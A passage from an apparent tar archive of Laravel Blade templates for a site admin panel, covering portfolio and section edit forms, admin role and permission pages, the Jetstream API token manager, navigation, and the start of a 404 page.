class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="6"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="12"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/edit.blade.php����������������������������������������������������������������0000644�����������������00000026046�14765366573�0013550 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_portfolio') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.select') }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('portfolio-content.create', $portfolio->id) }}">{{ __('content.service_content') }}</a> <a class="dropdown-item" href="{{ route('portfolio-detail.create', $portfolio->id) }}">{{ __('content.service_details') }}</a> <a class="dropdown-item" href="{{ route('portfolio-image.create', $portfolio->id) }}">{{ __('content.service_images') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/portfolio-style1.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio.update', $portfolio->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $portfolio->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input type="text" name="title" class="form-control" id="title" value="{{ $portfolio->title }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach ($categories as $category) <option value="{{ $category->id}}" {{ $category->id == $portfolio->category_id ? 'selected' : '' }}>{{ $category->category_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.thumbnail') }} ({{ __('content.size') }} 600 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($portfolio->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/portfolio/'.$portfolio->section_image) }}" alt="image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($portfolio->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $portfolio->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }} </label> <input id="url" name="url" type="text" class="form-control" value="{{ $portfolio->url }}"> <small class="form-text text-muted">{{ __('content.when_you_leave_this_section_blank_it_will_go_to_its_own_detail_page') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $portfolio->order }}"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $portfolio->status == 'published' ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $portfolio->status == 'draft' ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $portfolio->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('portfolio.destroy_image', $portfolio->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/admin_role/create.blade.php�������������������������������������������������������������0000644�����������������00000004601�14765366573�0014153 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_admin_role') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('admin-role.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.role_name') }} <span class="text-red">*</span></label> <input id="name" name="name" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label>{{ __('content.permissions') }} <span class="text-red">*</span></label><br> @foreach ($permissions as $permission) <span class="badge badge-success mr-3 mb-3 font-16"><input type="checkbox" name="is_ok[]" value="{{ $permission->name }}"> {{ $permission->name }}</span> @endforeach <small class="form-text text-muted">{{ __('content.set_permissions_for_this_role') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������views/admin/admin_role/index.blade.php��������������������������������������������������������������0000644�����������������00000013735�14765366573�0014027 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.admin_manage') }}</h6> <div> <a href="{{ url('admin/admin-role/create') }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_admin_role') }}</a> </div> </div> @if (count($roles) > 0) <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.role_name') }}</th> <th>{{ __('content.permissions') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $i = 1; @endphp @foreach ($roles as $role) <tr> <td>{{ $i++ }}</td> <td>{{ $role->name }}</td> <td> @php $role_permissions = $role->getAllPermissions(); @endphp @if ($role->name == 'super-admin') <span class="badge badge-success m-1">{{ __('content.has_all_permissions') }}</span> @else @foreach ($role_permissions as $role_permission) <span class="badge badge-success m-1">{{ $role_permission->name }}</span> @endforeach @endif </td> <td> <div> @if ($role->name != 'super-admin') <a href="{{ route('admin-role.edit', $role->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $role->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $role->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('admin-role.destroy', $role->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> @endsection�����������������������������������views/admin/admin_role/edit.blade.php���������������������������������������������������������������0000644�����������������00000006563�14765366573�0013646 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.edit_admin_role') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('admin-role.update', $role->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.role_name') }} <span class="text-red">*</span></label> <input id="name" name="name" type="text" class="form-control" value="{{ $role->name }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label>{{ __('content.permissions') }} <span class="text-red">*</span></label><br> @php $role_permissions = $role->getAllPermissions(); $checked_permissions = array(); foreach ($role_permissions as $role_permission) { $checked_permissions[] = $role_permission->name; } @endphp @foreach ($permissions as $permission) @if (in_array($permission->name , $checked_permissions)) <span class="badge badge-success mr-3 mb-3 font-16"><input type="checkbox" name="is_ok[]" value="{{ $permission->name }}" checked> {{ $permission->name }}</span> @else <span class="badge badge-success mr-3 mb-3 font-16"><input type="checkbox" name="is_ok[]" value="{{ $permission->name }}"> {{ $permission->name }}</span> @endif @endforeach <small class="form-text text-muted">{{ __('content.set_permissions_for_this_role') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection���������������������������������������������������������������������������������������������������������������������������������������������views/api/api-token-manager.blade.php���������������������������������������������������������������0000644�����������������00000015467�14765366573�0013573 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<div> <!-- Generate API Token --> <x-form-section submit="createApiToken"> <x-slot name="title"> {{ __('Create API Token') }} </x-slot> <x-slot name="description"> {{ __('API tokens allow third-party services to authenticate with our application on your behalf.') }} </x-slot> <x-slot name="form"> <!-- Token Name --> <div class="col-span-6 sm:col-span-4"> <x-label for="name" value="{{ __('Token Name') }}" /> <x-input id="name" type="text" class="mt-1 block w-full" wire:model.defer="createApiTokenForm.name" autofocus /> <x-input-error for="name" class="mt-2" /> </div> <!-- Token Permissions --> @if (Laravel\Jetstream\Jetstream::hasPermissions()) <div class="col-span-6"> <x-label for="permissions" value="{{ __('Permissions') }}" /> <div class="mt-2 grid grid-cols-1 md:grid-cols-2 gap-4"> @foreach (Laravel\Jetstream\Jetstream::$permissions as $permission) <label class="flex items-center"> <x-checkbox wire:model.defer="createApiTokenForm.permissions" :value="$permission"/> <span class="ml-2 text-sm text-gray-600">{{ $permission }}</span> </label> @endforeach </div> </div> @endif </x-slot> <x-slot name="actions"> <x-action-message class="mr-3" on="created"> {{ __('Created.') }} </x-action-message> <x-button> {{ __('Create') }} </x-button> </x-slot> </x-form-section> @if ($this->user->tokens->isNotEmpty()) <x-section-border /> <!-- Manage API Tokens --> <div class="mt-10 sm:mt-0"> <x-action-section> <x-slot name="title"> {{ __('Manage API Tokens') }} </x-slot> <x-slot name="description"> {{ __('You may delete any of your existing tokens if they are no longer needed.') }} </x-slot> <!-- API Token List --> <x-slot name="content"> <div class="space-y-6"> @foreach ($this->user->tokens->sortBy('name') as $token) <div class="flex items-center justify-between"> <div class="break-all"> {{ $token->name }} </div> <div class="flex items-center ml-2"> @if ($token->last_used_at) <div class="text-sm text-gray-400"> {{ __('Last used') }} {{ $token->last_used_at->diffForHumans() }} </div> @endif @if (Laravel\Jetstream\Jetstream::hasPermissions()) <button class="cursor-pointer ml-6 text-sm text-gray-400 underline" wire:click="manageApiTokenPermissions({{ $token->id }})"> {{ __('Permissions') }} </button> @endif <button class="cursor-pointer ml-6 text-sm text-red-500" wire:click="confirmApiTokenDeletion({{ $token->id }})"> {{ __('Delete') }} </button> </div> </div> @endforeach </div> </x-slot> </x-action-section> </div> @endif <!-- Token Value Modal --> <x-dialog-modal wire:model="displayingToken"> <x-slot name="title"> {{ __('API Token') }} </x-slot> <x-slot name="content"> <div> {{ __('Please copy your new API token. For your security, it won\'t be shown again.') }} </div> <x-input x-ref="plaintextToken" type="text" readonly :value="$plainTextToken" class="mt-4 bg-gray-100 px-4 py-2 rounded font-mono text-sm text-gray-500 w-full break-all" autofocus autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" @showing-token-modal.window="setTimeout(() => $refs.plaintextToken.select(), 250)" /> </x-slot> <x-slot name="footer"> <x-secondary-button wire:click="$set('displayingToken', false)" wire:loading.attr="disabled"> {{ __('Close') }} </x-secondary-button> </x-slot> </x-dialog-modal> <!-- API Token Permissions Modal --> <x-dialog-modal wire:model="managingApiTokenPermissions"> <x-slot name="title"> {{ __('API Token Permissions') }} </x-slot> <x-slot name="content"> <div class="grid grid-cols-1 md:grid-cols-2 gap-4"> @foreach (Laravel\Jetstream\Jetstream::$permissions as $permission) <label class="flex items-center"> <x-checkbox wire:model.defer="updateApiTokenForm.permissions" :value="$permission"/> <span class="ml-2 text-sm text-gray-600">{{ $permission }}</span> </label> @endforeach </div> </x-slot> <x-slot name="footer"> <x-secondary-button wire:click="$set('managingApiTokenPermissions', false)" wire:loading.attr="disabled"> {{ __('Cancel') }} </x-secondary-button> <x-button class="ml-3" wire:click="updateApiToken" wire:loading.attr="disabled"> {{ __('Save') }} </x-button> </x-slot> </x-dialog-modal> <!-- Delete Token Confirmation Modal --> <x-confirmation-modal wire:model="confirmingApiTokenDeletion"> <x-slot name="title"> {{ __('Delete API Token') }} </x-slot> <x-slot name="content"> {{ __('Are you sure you would like to delete this API token?') }} </x-slot> <x-slot name="footer"> <x-secondary-button wire:click="$toggle('confirmingApiTokenDeletion')" wire:loading.attr="disabled"> {{ __('Cancel') }} </x-secondary-button> <x-danger-button class="ml-3" wire:click="deleteApiToken" wire:loading.attr="disabled"> {{ __('Delete') }} </x-danger-button> </x-slot> </x-confirmation-modal> </div> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/api/index.blade.php���������������������������������������������������������������������������0000644�����������������00000000522�14765366573�0011365 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-app-layout> <x-slot name="header"> <h2 class="font-semibold text-xl text-gray-800 leading-tight"> {{ __('API Tokens') }} </h2> </x-slot> <div> <div class="max-w-7xl mx-auto py-10 sm:px-6 lg:px-8"> @livewire('api.api-token-manager') </div> </div> </x-app-layout> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/policy.blade.php������������������������������������������������������������������������������0000644�����������������00000000641�14765366573�0011006 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-guest-layout> <div class="pt-4 bg-gray-100"> <div class="min-h-screen flex flex-col items-center pt-6 sm:pt-0"> <div> <x-authentication-card-logo /> </div> <div class="w-full sm:max-w-2xl mt-6 p-6 bg-white shadow-md overflow-hidden sm:rounded-lg prose"> {!! $policy !!} </div> </div> </div> </x-guest-layout> �����������������������������������������������������������������������������������������������views/navigation-menu.blade.php���������������������������������������������������������������������0000644�����������������00000026270�14765366573�0012616 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<nav x-data="{ open: false }" class="bg-white border-b border-gray-100"> <!-- Primary Navigation Menu --> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="flex justify-between h-16"> <div class="flex"> <!-- Logo --> <div class="shrink-0 flex items-center"> <a href="{{ route('dashboard') }}"> <x-application-mark class="block h-9 w-auto" /> </a> </div> <!-- Navigation Links --> <div class="hidden space-x-8 sm:-my-px sm:ml-10 sm:flex"> <x-nav-link href="{{ route('dashboard') }}" :active="request()->routeIs('dashboard')"> {{ __('Dashboard') }} </x-nav-link> </div> </div> <div class="hidden sm:flex sm:items-center sm:ml-6"> <!-- Teams Dropdown --> @if (Laravel\Jetstream\Jetstream::hasTeamFeatures()) <div class="ml-3 relative"> <x-dropdown align="right" width="60"> <x-slot name="trigger"> <span class="inline-flex rounded-md"> <button type="button" class="inline-flex items-center px-3 py-2 border border-transparent text-sm leading-4 font-medium rounded-md text-gray-500 bg-white hover:text-gray-700 focus:outline-none focus:bg-gray-50 active:bg-gray-50 transition ease-in-out duration-150"> {{ Auth::user()->currentTeam->name }} <svg class="ml-2 -mr-0.5 h-4 w-4" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M8.25 15L12 18.75 15.75 15m-7.5-6L12 5.25 15.75 9" /> </svg> </button> </span> </x-slot> <x-slot name="content"> <div class="w-60"> <!-- Team Management --> <div class="block px-4 py-2 text-xs text-gray-400"> {{ __('Manage Team') }} </div> <!-- Team Settings --> <x-dropdown-link href="{{ route('teams.show', Auth::user()->currentTeam->id) }}"> {{ __('Team Settings') }} </x-dropdown-link> @can('create', Laravel\Jetstream\Jetstream::newTeamModel()) <x-dropdown-link href="{{ route('teams.create') }}"> {{ __('Create New Team') }} </x-dropdown-link> @endcan <div class="border-t border-gray-200"></div> <!-- Team Switcher --> <div class="block px-4 py-2 text-xs text-gray-400"> {{ __('Switch Teams') }} </div> @foreach (Auth::user()->allTeams() as $team) <x-switchable-team :team="$team" /> @endforeach </div> </x-slot> </x-dropdown> </div> @endif <!-- Settings Dropdown --> <div class="ml-3 relative"> <x-dropdown align="right" width="48"> <x-slot name="trigger"> @if (Laravel\Jetstream\Jetstream::managesProfilePhotos()) <button class="flex text-sm border-2 border-transparent rounded-full focus:outline-none focus:border-gray-300 transition"> <img class="h-8 w-8 rounded-full object-cover" src="{{ Auth::user()->profile_photo_url }}" alt="{{ Auth::user()->name }}" /> </button> @else <span class="inline-flex rounded-md"> <button type="button" class="inline-flex items-center px-3 py-2 border border-transparent text-sm leading-4 font-medium rounded-md text-gray-500 bg-white hover:text-gray-700 focus:outline-none focus:bg-gray-50 active:bg-gray-50 transition ease-in-out duration-150"> {{ Auth::user()->name }} <svg class="ml-2 -mr-0.5 h-4 w-4" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor"> <path stroke-linecap="round" stroke-linejoin="round" d="M19.5 8.25l-7.5 7.5-7.5-7.5" /> </svg> </button> </span> @endif </x-slot> <x-slot name="content"> <!-- Account Management --> <div class="block px-4 py-2 text-xs text-gray-400"> {{ __('Manage Account') }} </div> <x-dropdown-link href="{{ route('profile.show') }}"> {{ __('Profile') }} </x-dropdown-link> @if (Laravel\Jetstream\Jetstream::hasApiFeatures()) <x-dropdown-link href="{{ route('api-tokens.index') }}"> {{ __('API Tokens') }} </x-dropdown-link> @endif <div class="border-t border-gray-200"></div> <!-- Authentication --> <form method="POST" action="{{ route('logout') }}" x-data> @csrf <x-dropdown-link href="{{ route('logout') }}" @click.prevent="$root.submit();"> {{ __('Log Out') }} </x-dropdown-link> </form> </x-slot> </x-dropdown> </div> </div> <!-- Hamburger --> <div class="-mr-2 flex items-center sm:hidden"> <button @click="open = ! open" class="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-gray-500 hover:bg-gray-100 focus:outline-none focus:bg-gray-100 focus:text-gray-500 transition duration-150 ease-in-out"> <svg class="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24"> <path :class="{'hidden': open, 'inline-flex': ! open }" class="inline-flex" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16" /> <path :class="{'hidden': ! open, 'inline-flex': open }" class="hidden" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M6 18L18 6M6 6l12 12" /> </svg> </button> </div> </div> </div> <!-- Responsive Navigation Menu --> <div :class="{'block': open, 'hidden': ! open}" class="hidden sm:hidden"> <div class="pt-2 pb-3 space-y-1"> <x-responsive-nav-link href="{{ route('dashboard') }}" :active="request()->routeIs('dashboard')"> {{ __('Dashboard') }} </x-responsive-nav-link> </div> <!-- Responsive Settings Options --> <div class="pt-4 pb-1 border-t border-gray-200"> <div class="flex items-center px-4"> @if (Laravel\Jetstream\Jetstream::managesProfilePhotos()) <div class="shrink-0 mr-3"> <img class="h-10 w-10 rounded-full object-cover" src="{{ Auth::user()->profile_photo_url }}" alt="{{ Auth::user()->name }}" /> </div> @endif <div> <div class="font-medium text-base text-gray-800">{{ Auth::user()->name }}</div> <div class="font-medium text-sm text-gray-500">{{ Auth::user()->email }}</div> </div> </div> <div class="mt-3 space-y-1"> <!-- Account Management --> <x-responsive-nav-link href="{{ route('profile.show') }}" :active="request()->routeIs('profile.show')"> {{ __('Profile') }} </x-responsive-nav-link> @if (Laravel\Jetstream\Jetstream::hasApiFeatures()) <x-responsive-nav-link href="{{ route('api-tokens.index') }}" :active="request()->routeIs('api-tokens.index')"> {{ __('API Tokens') }} </x-responsive-nav-link> @endif <!-- Authentication --> <form method="POST" action="{{ route('logout') }}" x-data> @csrf <x-responsive-nav-link href="{{ route('logout') }}" @click.prevent="$root.submit();"> {{ __('Log Out') }} </x-responsive-nav-link> </form> <!-- Team Management --> @if (Laravel\Jetstream\Jetstream::hasTeamFeatures()) <div class="border-t border-gray-200"></div> <div class="block px-4 py-2 text-xs text-gray-400"> {{ __('Manage Team') }} </div> <!-- Team Settings --> <x-responsive-nav-link href="{{ route('teams.show', Auth::user()->currentTeam->id) }}" :active="request()->routeIs('teams.show')"> {{ __('Team Settings') }} </x-responsive-nav-link> @can('create', Laravel\Jetstream\Jetstream::newTeamModel()) <x-responsive-nav-link href="{{ route('teams.create') }}" :active="request()->routeIs('teams.create')"> {{ __('Create New Team') }} </x-responsive-nav-link> @endcan <div class="border-t border-gray-200"></div> <!-- Team Switcher --> <div class="block px-4 py-2 text-xs text-gray-400"> {{ __('Switch Teams') }} </div> @foreach (Auth::user()->allTeams() as $team) <x-switchable-team :team="$team" component="responsive-nav-link" /> @endforeach @endif </div> </div> </div> </nav> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/errors/404.blade.php��������������������������������������������������������������������������0000644�����������������00000012344�14765366573�0011335 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <title>Page is not found</title> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link 